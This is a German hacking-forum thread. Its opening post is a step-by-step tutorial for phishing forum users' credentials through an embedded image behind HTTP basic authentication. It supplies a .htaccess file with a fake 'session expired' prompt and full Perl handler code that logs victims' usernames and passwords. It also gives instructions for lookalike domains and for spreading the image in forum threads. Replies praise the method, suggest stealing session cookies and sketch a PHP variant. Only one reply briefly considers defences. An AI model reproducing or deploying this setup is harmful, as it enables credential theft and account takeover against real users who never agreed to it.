XSA - Cross-Site Authentication

[Hidden99]

Vor dem Backup hab ich hier schon aml dieses Tut gepostet ist von mir
und ich wollts euch nicht vorenthalten.

1. Was ist XSA

XSA steht für Cross Site Authentictication dies beschreibt ein Angriffs Verfahren
bei dem Cross Site Scripting und Phishing vereint werden, sodass das Opfer sich noch
auf der Original Seite befindet und die Daten durch ein htaccess Fenster gephisht werden.
Dies geschieht z.B. durch das einbinden eines Bildes, welches durch htaccess geschützt ist.

2. Was wird benötigt?

Xampp aktuellste Verion hier http://www.apachefriends.org/de/xampp-windows.html
-ACHTUNG Xampp ist recht unsicher -> nur zum testen
No-Ip oder sonstige Dynamische DNS (Konfiguration wird nicht beschrieben)
(Die Adresse sollt möglichst so gewählt werden, dass sie der Adresse des Forums
welches man angreifen möchte ähnlich sieht, da viele Browser den Seitennamen bei der htaccess Aufforderung ausgeben)

3. Vorbereitung

3.1
Xampp Installieren und No-IP so einrichten, dass man bei Eingabe
der No-Ip Adresse beim Xampp Bildschirm landet. (Bei manchen Routern
klappt das nicht, wenn man selbst auf die No-IP Adresse verbidnen möchte kommt
IMMER ein Fehler ( wie bei mir -.-). In dem Fall einfach einen Kumpel fragen ob er
das kurz testen kann.)

3.2
Wenn das klappt legt ihr einen neuen Ordner im Ordner htdocs an z.B: so:
C:\xampp\htdocs\test
in diesem Ordner erstellt ihr eine Datei namens ".htaccess" Mit folgendem Inhalt:

AuthType Basic
AuthName "hier ändern"
PerlAuthenHandler Apache2::UserPwLog
require valid-user

Dort wo Hier ändern steht könnt ihr einen Fenstertitel eintragen...
z.B. sowas hier "Forum.xy - Ihre Session-ID ist abgelaufen bitte geben sie ihre Daten erneut an."
Hinweis: Wenn ihr probleme damit habt die Datei zu erstellen öffnet den Text editor geht auf Speichern unter...
stellt auf "Alle Dateien" und gebt als Dateinamen ".htaccess" ein

3.3
Ihr geht nach C:\xampp\perl\site\lib\Apache2
und ihr erstellt eine Datei mit dem namen UserPwLog.pm
Und diesem Inhalt

package Apache2::UserPwLog;
use strict;
use Apache2::Const qw(:common);
sub handler
{
my($connection) = shift;
my($result, $password) = $connection->get_basic_auth_pw;
return $result if $result != OK;
my $username = $connection->user;
unless($username && $password)
{
$connection->note_basic_auth_failure;
return AUTH_REQUIRED;
}
open (LOGFILE,'>>c:\xampp\log.txt');
printf LOGFILE "Benutzername: %s / Passwort: %s\n", $username, $password;
close LOGFILE;
return OK;
}1
;

Die Datei könnt ihr natürlich nach belieben abändern
z.b. den Pfad C:\xampp\log.txt

3.4
Ihr müsst lediglich ein Bild (oder mehrere) im Ordner
C:\xampp\htdocs\test\ platzieren, welches möglichst zum Thema des Threads passt in welchem
ihreuren Link verteilen wollt

4.Testen & Spreaden
Jetzt sollte wenn ihr auf eure No-Ip adresse verbindet und hinter die Adresse \test\euerbild.jpg setzt
ein htaccess Fenster erscheinen welches euch nach euren Daten fragt.
Wenn ihr sie eingegeben habt wird eine Datei im angegebenen Pfad erstellt welche diese Daten enthält

Ok zum spreaden geht ihr einfach auf eure Ziel Hompage welche das Einbinden von externen Bildern
erlaubt; durch Tags z.B. [img] [/img]
in diese Tags schreibt ihr einfach den Link zu eurem Pic und jeder der den Thread öffnet
wird von eurem htaccess Fenster begrüßt welche die Daten abfängt.

[trisn]

gefällt mir

[iiFrek]

Geil^^ super hab getestet!

[PoLe]

Nice kannte ich noch nicht, gefällt mir

[kalachnikov]

hört sich gut an.
Da gibts ja auch sowas, dass man via Bild die Userdaten abfragen und speichern kann, indem man das Bild editiert und PHP-Code einfügt, welches dann beim Betrachten des Bildes bzw. Öffnen der Seite, die das Bild enthält, auch ausgeführt wird.

Weiß noch jemand wie das ging?

[Bonkers]

indem man das Bild editiert und PHP-Code einfügt, welches dann beim Betrachten des Bildes bzw. Öffnen der Seite, die das Bild enthält, auch ausgeführt wird.

Du willst mit PHP Userdaten stehlen? Selbst wenn der Code ausgeführt wird kommst du an überhaupt nichts, du müsstest schon JavaScript ins Bild packen.
Oder möchtest du den Code in einem Fremden Board ausführen? Praktisch eine Shell in dein Bild einbinden?

[kalachnikov]

Ich hab gedacht, dass man PHP-Code in ein Bild einschleusen kann und wenn man dann das Bild in irgendeinem Board sieht uhrzeit, ip etc, gespeichert werden.
Das Bild muss die Endung .jpg, .png etc. haben..

[novaca!ne]

Ich denke ich verstehe das was er meint.
Ich hatte mal einen hp counter, dann musste man ein js script einbinden der ein Bild enthält.
Besucht man die url des bildes, sieht man das es ein .php script ist, und besucher informationen werden über den get parameter übertragen an den counter dienst.
in der url stand der browser, os, reflink etc.
blah.ru/image.php?browser=firefox&os=windows und soweiter.

Damit könnte man auch das session cookie "abziehen".

[The-God-of-all]

kalachnikov meinst du vielleicht, dass einfach der Handler anstelle eines Perl Skriptes ein PHP Skript ist?
Das ließe sich einfach machen indem man eine PHP Datei verknüpft, diese muss aber ohne weiteres erreichbar sein (also keine .htaccess im Ordner). Dann kann man beim Aufruf des PHP Skripts irgendwie den Header auslesen, schauen ob ein Login angegeben ist und wenn nicht mithilfe des Header Befehls dann dem Browser sagen, dass sich der User einloggen soll. Wenn Benutzername und Passwort enthalten sind kann man einfach per readfile() das Bild ausgeben und eben die Daten speichern.

Wie könnte man sich mit seinem Forum davor schützen? Eigentlich müsste der Server dann ja für jedes externe Bild erst eine Anfrage schicken und überprüfen ob das Bild ohne Passwort erreichbar ist. Und selbst diese Abfrage müsste bei jedem Aufruf wiederholt werden weil sonst könnte man es ja erst so lassen und dann wenn der Server fertig ist die Abfrage aktivieren. Oder eine erkennung einbauen ob die Anfrage vom Server kommt. Das ist alles sehr aufwendig und hilft nichts. Und Bilder ganz deaktivieren ist wohl auch keine gute Option. Hilft nur eins: Entweder nur Bilder die auf den Server selbst hochgeladen werden einbinden lassen oder gar keine Bilder zulassen. Ansonsten könnte man nur vielleicht die Augen offen halten und die Benutzer gegebenenfalls warnen.

[kalachnikov]

ja. als Beispiel könnte das Bild in meiner Signatur dienen.
Es werden sämtliche Daten eines User angezeigts, der grade die Seite besucht, natürlich getarnt als Bild..